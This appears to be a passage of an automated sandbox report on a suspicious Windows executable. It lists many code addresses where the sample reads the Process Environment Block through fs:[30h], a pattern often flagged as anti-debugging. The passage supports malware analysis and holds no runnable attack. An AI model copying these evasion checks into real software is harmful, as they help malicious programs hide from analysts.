Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAC700 mov eax, dword ptr fs:[00000030h]	9_2_01AAC700
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A70710 mov eax, dword ptr fs:[00000030h]	9_2_01A70710
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA0710 mov eax, dword ptr fs:[00000030h]	9_2_01AA0710
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A78770 mov eax, dword ptr fs:[00000030h]	9_2_01A78770
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80770 mov eax, dword ptr fs:[00000030h]	9_2_01A80770
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80770 mov eax, dword ptr fs:[00000030h]	9_2_01A80770
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80770 mov eax, dword ptr fs:[00000030h]	9_2_01A80770
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80770 mov eax, dword ptr fs:[00000030h]	9_2_01A80770
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80770 mov eax, dword ptr fs:[00000030h]	9_2_01A80770
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80770 mov eax, dword ptr fs:[00000030h]	9_2_01A80770
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80770 mov eax, dword ptr fs:[00000030h]	9_2_01A80770
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80770 mov eax, dword ptr fs:[00000030h]	9_2_01A80770
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80770 mov eax, dword ptr fs:[00000030h]	9_2_01A80770
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80770 mov eax, dword ptr fs:[00000030h]	9_2_01A80770
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80770 mov eax, dword ptr fs:[00000030h]	9_2_01A80770
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80770 mov eax, dword ptr fs:[00000030h]	9_2_01A80770
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA674D mov esi, dword ptr fs:[00000030h]	9_2_01AA674D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA674D mov eax, dword ptr fs:[00000030h]	9_2_01AA674D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA674D mov eax, dword ptr fs:[00000030h]	9_2_01AA674D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AFE75D mov eax, dword ptr fs:[00000030h]	9_2_01AFE75D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A70750 mov eax, dword ptr fs:[00000030h]	9_2_01A70750
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF4755 mov eax, dword ptr fs:[00000030h]	9_2_01AF4755
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2750 mov eax, dword ptr fs:[00000030h]	9_2_01AB2750
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2750 mov eax, dword ptr fs:[00000030h]	9_2_01AB2750
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAC6A6 mov eax, dword ptr fs:[00000030h]	9_2_01AAC6A6
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA66B0 mov eax, dword ptr fs:[00000030h]	9_2_01AA66B0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A74690 mov eax, dword ptr fs:[00000030h]	9_2_01A74690
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A74690 mov eax, dword ptr fs:[00000030h]	9_2_01A74690
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEE6F2 mov eax, dword ptr fs:[00000030h]	9_2_01AEE6F2
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEE6F2 mov eax, dword ptr fs:[00000030h]	9_2_01AEE6F2
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEE6F2 mov eax, dword ptr fs:[00000030h]	9_2_01AEE6F2
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEE6F2 mov eax, dword ptr fs:[00000030h]	9_2_01AEE6F2
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF06F1 mov eax, dword ptr fs:[00000030h]	9_2_01AF06F1
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF06F1 mov eax, dword ptr fs:[00000030h]	9_2_01AF06F1
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAA6C7 mov ebx, dword ptr fs:[00000030h]	9_2_01AAA6C7
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAA6C7 mov eax, dword ptr fs:[00000030h]	9_2_01AAA6C7
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA6620 mov eax, dword ptr fs:[00000030h]	9_2_01AA6620
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA8620 mov eax, dword ptr fs:[00000030h]	9_2_01AA8620
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7262C mov eax, dword ptr fs:[00000030h]	9_2_01A7262C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8E627 mov eax, dword ptr fs:[00000030h]	9_2_01A8E627
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8260B mov eax, dword ptr fs:[00000030h]	9_2_01A8260B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8260B mov eax, dword ptr fs:[00000030h]	9_2_01A8260B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8260B mov eax, dword ptr fs:[00000030h]	9_2_01A8260B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8260B mov eax, dword ptr fs:[00000030h]	9_2_01A8260B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8260B mov eax, dword ptr fs:[00000030h]	9_2_01A8260B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8260B mov eax, dword ptr fs:[00000030h]	9_2_01A8260B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8260B mov eax, dword ptr fs:[00000030h]	9_2_01A8260B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEE609 mov eax, dword ptr fs:[00000030h]	9_2_01AEE609
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2619 mov eax, dword ptr fs:[00000030h]	9_2_01AB2619
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAA660 mov eax, dword ptr fs:[00000030h]	9_2_01AAA660
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAA660 mov eax, dword ptr fs:[00000030h]	9_2_01AAA660
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3866E mov eax, dword ptr fs:[00000030h]	9_2_01B3866E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3866E mov eax, dword ptr fs:[00000030h]	9_2_01B3866E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA2674 mov eax, dword ptr fs:[00000030h]	9_2_01AA2674
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8C640 mov eax, dword ptr fs:[00000030h]	9_2_01A8C640
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A829A0 mov eax, dword ptr fs:[00000030h]	9_2_01A829A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A829A0 mov eax, dword ptr fs:[00000030h]	9_2_01A829A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A829A0 mov eax, dword ptr fs:[00000030h]	9_2_01A829A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A829A0 mov eax, dword ptr fs:[00000030h]	9_2_01A829A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A829A0 mov eax, dword ptr fs:[00000030h]	9_2_01A829A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A829A0 mov eax, dword ptr fs:[00000030h]	9_2_01A829A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A829A0 mov eax, dword ptr fs:[00000030h]	9_2_01A829A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A829A0 mov eax, dword ptr fs:[00000030h]	9_2_01A829A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A829A0 mov eax, dword ptr fs:[00000030h]	9_2_01A829A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A829A0 mov eax, dword ptr fs:[00000030h]	9_2_01A829A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A829A0 mov eax, dword ptr fs:[00000030h]	9_2_01A829A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A829A0 mov eax, dword ptr fs:[00000030h]	9_2_01A829A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A829A0 mov eax, dword ptr fs:[00000030h]	9_2_01A829A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A709AD mov eax, dword ptr fs:[00000030h]	9_2_01A709AD
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A709AD mov eax, dword ptr fs:[00000030h]	9_2_01A709AD
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF89B3 mov esi, dword ptr fs:[00000030h]	9_2_01AF89B3
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF89B3 mov eax, dword ptr fs:[00000030h]	9_2_01AF89B3
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF89B3 mov eax, dword ptr fs:[00000030h]	9_2_01AF89B3
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AFE9E0 mov eax, dword ptr fs:[00000030h]	9_2_01AFE9E0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA29F9 mov eax, dword ptr fs:[00000030h]	9_2_01AA29F9
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA29F9 mov eax, dword ptr fs:[00000030h]	9_2_01AA29F9
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3A9D3 mov eax, dword ptr fs:[00000030h]	9_2_01B3A9D3
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B069C0 mov eax, dword ptr fs:[00000030h]	9_2_01B069C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A9D0 mov eax, dword ptr fs:[00000030h]	9_2_01A7A9D0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A9D0 mov eax, dword ptr fs:[00000030h]	9_2_01A7A9D0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A9D0 mov eax, dword ptr fs:[00000030h]	9_2_01A7A9D0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A9D0 mov eax, dword ptr fs:[00000030h]	9_2_01A7A9D0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A9D0 mov eax, dword ptr fs:[00000030h]	9_2_01A7A9D0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A9D0 mov eax, dword ptr fs:[00000030h]	9_2_01A7A9D0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA49D0 mov eax, dword ptr fs:[00000030h]	9_2_01AA49D0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF892A mov eax, dword ptr fs:[00000030h]	9_2_01AF892A
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B0892B mov eax, dword ptr fs:[00000030h]	9_2_01B0892B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEE908 mov eax, dword ptr fs:[00000030h]	9_2_01AEE908
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEE908 mov eax, dword ptr fs:[00000030h]	9_2_01AEE908
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AFC912 mov eax, dword ptr fs:[00000030h]	9_2_01AFC912
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A68918 mov eax, dword ptr fs:[00000030h]	9_2_01A68918
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A68918 mov eax, dword ptr fs:[00000030h]	9_2_01A68918
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB096E mov eax, dword ptr fs:[00000030h]	9_2_01AB096E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB096E mov edx, dword ptr fs:[00000030h]	9_2_01AB096E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB096E mov eax, dword ptr fs:[00000030h]	9_2_01AB096E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B14978 mov eax, dword ptr fs:[00000030h]	9_2_01B14978
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B14978 mov eax, dword ptr fs:[00000030h]	9_2_01B14978
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A96962 mov eax, dword ptr fs:[00000030h]	9_2_01A96962
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A96962 mov eax, dword ptr fs:[00000030h]	9_2_01A96962
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A96962 mov eax, dword ptr fs:[00000030h]	9_2_01A96962
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AFC97C mov eax, dword ptr fs:[00000030h]	9_2_01AFC97C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF0946 mov eax, dword ptr fs:[00000030h]	9_2_01AF0946
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B44940 mov eax, dword ptr fs:[00000030h]	9_2_01B44940
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A70887 mov eax, dword ptr fs:[00000030h]	9_2_01A70887
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AFC89D mov eax, dword ptr fs:[00000030h]	9_2_01AFC89D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAC8F9 mov eax, dword ptr fs:[00000030h]	9_2_01AAC8F9
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAC8F9 mov eax, dword ptr fs:[00000030h]	9_2_01AAC8F9
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3A8E4 mov eax, dword ptr fs:[00000030h]	9_2_01B3A8E4
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9E8C0 mov eax, dword ptr fs:[00000030h]	9_2_01A9E8C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B408C0 mov eax, dword ptr fs:[00000030h]	9_2_01B408C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1483A mov eax, dword ptr fs:[00000030h]	9_2_01B1483A
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1483A mov eax, dword ptr fs:[00000030h]	9_2_01B1483A
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAA830 mov eax, dword ptr fs:[00000030h]	9_2_01AAA830
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A92835 mov eax, dword ptr fs:[00000030h]	9_2_01A92835
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A92835 mov eax, dword ptr fs:[00000030h]	9_2_01A92835
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A92835 mov eax, dword ptr fs:[00000030h]	9_2_01A92835
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A92835 mov ecx, dword ptr fs:[00000030h]	9_2_01A92835
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A92835 mov eax, dword ptr fs:[00000030h]	9_2_01A92835
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A92835 mov eax, dword ptr fs:[00000030h]	9_2_01A92835
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AFC810 mov eax, dword ptr fs:[00000030h]	9_2_01AFC810
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B06870 mov eax, dword ptr fs:[00000030h]	9_2_01B06870
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B06870 mov eax, dword ptr fs:[00000030h]	9_2_01B06870
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AFE872 mov eax, dword ptr fs:[00000030h]	9_2_01AFE872
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AFE872 mov eax, dword ptr fs:[00000030h]	9_2_01AFE872
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A82840 mov ecx, dword ptr fs:[00000030h]	9_2_01A82840
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A74859 mov eax, dword ptr fs:[00000030h]	9_2_01A74859
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A74859 mov eax, dword ptr fs:[00000030h]	9_2_01A74859
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA0854 mov eax, dword ptr fs:[00000030h]	9_2_01AA0854
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B24BB0 mov eax, dword ptr fs:[00000030h]	9_2_01B24BB0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B24BB0 mov eax, dword ptr fs:[00000030h]	9_2_01B24BB0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80BBE mov eax, dword ptr fs:[00000030h]	9_2_01A80BBE
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80BBE mov eax, dword ptr fs:[00000030h]	9_2_01A80BBE
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9EBFC mov eax, dword ptr fs:[00000030h]	9_2_01A9EBFC
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A78BF0 mov eax, dword ptr fs:[00000030h]	9_2_01A78BF0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A78BF0 mov eax, dword ptr fs:[00000030h]	9_2_01A78BF0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A78BF0 mov eax, dword ptr fs:[00000030h]	9_2_01A78BF0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AFCBF0 mov eax, dword ptr fs:[00000030h]	9_2_01AFCBF0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1EBD0 mov eax, dword ptr fs:[00000030h]	9_2_01B1EBD0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A90BCB mov eax, dword ptr fs:[00000030h]	9_2_01A90BCB
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A90BCB mov eax, dword ptr fs:[00000030h]	9_2_01A90BCB
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A90BCB mov eax, dword ptr fs:[00000030h]	9_2_01A90BCB
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A70BCD mov eax, dword ptr fs:[00000030h]	9_2_01A70BCD
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A70BCD mov eax, dword ptr fs:[00000030h]	9_2_01A70BCD
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A70BCD mov eax, dword ptr fs:[00000030h]	9_2_01A70BCD
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9EB20 mov eax, dword ptr fs:[00000030h]	9_2_01A9EB20
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9EB20 mov eax, dword ptr fs:[00000030h]	9_2_01A9EB20
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B38B28 mov eax, dword ptr fs:[00000030h]	9_2_01B38B28
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B38B28 mov eax, dword ptr fs:[00000030h]	9_2_01B38B28
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEEB1D mov eax, dword ptr fs:[00000030h]	9_2_01AEEB1D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEEB1D mov eax, dword ptr fs:[00000030h]	9_2_01AEEB1D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEEB1D mov eax, dword ptr fs:[00000030h]	9_2_01AEEB1D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEEB1D mov eax, dword ptr fs:[00000030h]	9_2_01AEEB1D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEEB1D mov eax, dword ptr fs:[00000030h]	9_2_01AEEB1D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEEB1D mov eax, dword ptr fs:[00000030h]	9_2_01AEEB1D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEEB1D mov eax, dword ptr fs:[00000030h]	9_2_01AEEB1D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEEB1D mov eax, dword ptr fs:[00000030h]	9_2_01AEEB1D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEEB1D mov eax, dword ptr fs:[00000030h]	9_2_01AEEB1D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B44B00 mov eax, dword ptr fs:[00000030h]	9_2_01B44B00
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6CB7E mov eax, dword ptr fs:[00000030h]	9_2_01A6CB7E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1EB50 mov eax, dword ptr fs:[00000030h]	9_2_01B1EB50
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B42B57 mov eax, dword ptr fs:[00000030h]	9_2_01B42B57
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B42B57 mov eax, dword ptr fs:[00000030h]	9_2_01B42B57
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B42B57 mov eax, dword ptr fs:[00000030h]	9_2_01B42B57
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B42B57 mov eax, dword ptr fs:[00000030h]	9_2_01B42B57
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B06B40 mov eax, dword ptr fs:[00000030h]	9_2_01B06B40
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B06B40 mov eax, dword ptr fs:[00000030h]	9_2_01B06B40
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3AB40 mov eax, dword ptr fs:[00000030h]	9_2_01B3AB40
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B18B42 mov eax, dword ptr fs:[00000030h]	9_2_01B18B42
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A68B50 mov eax, dword ptr fs:[00000030h]	9_2_01A68B50
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B24B4B mov eax, dword ptr fs:[00000030h]	9_2_01B24B4B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B24B4B mov eax, dword ptr fs:[00000030h]	9_2_01B24B4B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A78AA0 mov eax, dword ptr fs:[00000030h]	9_2_01A78AA0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A78AA0 mov eax, dword ptr fs:[00000030h]	9_2_01A78AA0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AC6AA4 mov eax, dword ptr fs:[00000030h]	9_2_01AC6AA4
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A7EA80
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A7EA80
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A7EA80
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A7EA80
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A7EA80
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A7EA80
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A7EA80
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A7EA80
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7EA80 mov eax, dword ptr fs:[00000030h]	9_2_01A7EA80
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B44A80 mov eax, dword ptr fs:[00000030h]	9_2_01B44A80
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA8A90 mov edx, dword ptr fs:[00000030h]	9_2_01AA8A90
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAAAEE mov eax, dword ptr fs:[00000030h]	9_2_01AAAAEE
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAAAEE mov eax, dword ptr fs:[00000030h]	9_2_01AAAAEE
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AC6ACC mov eax, dword ptr fs:[00000030h]	9_2_01AC6ACC
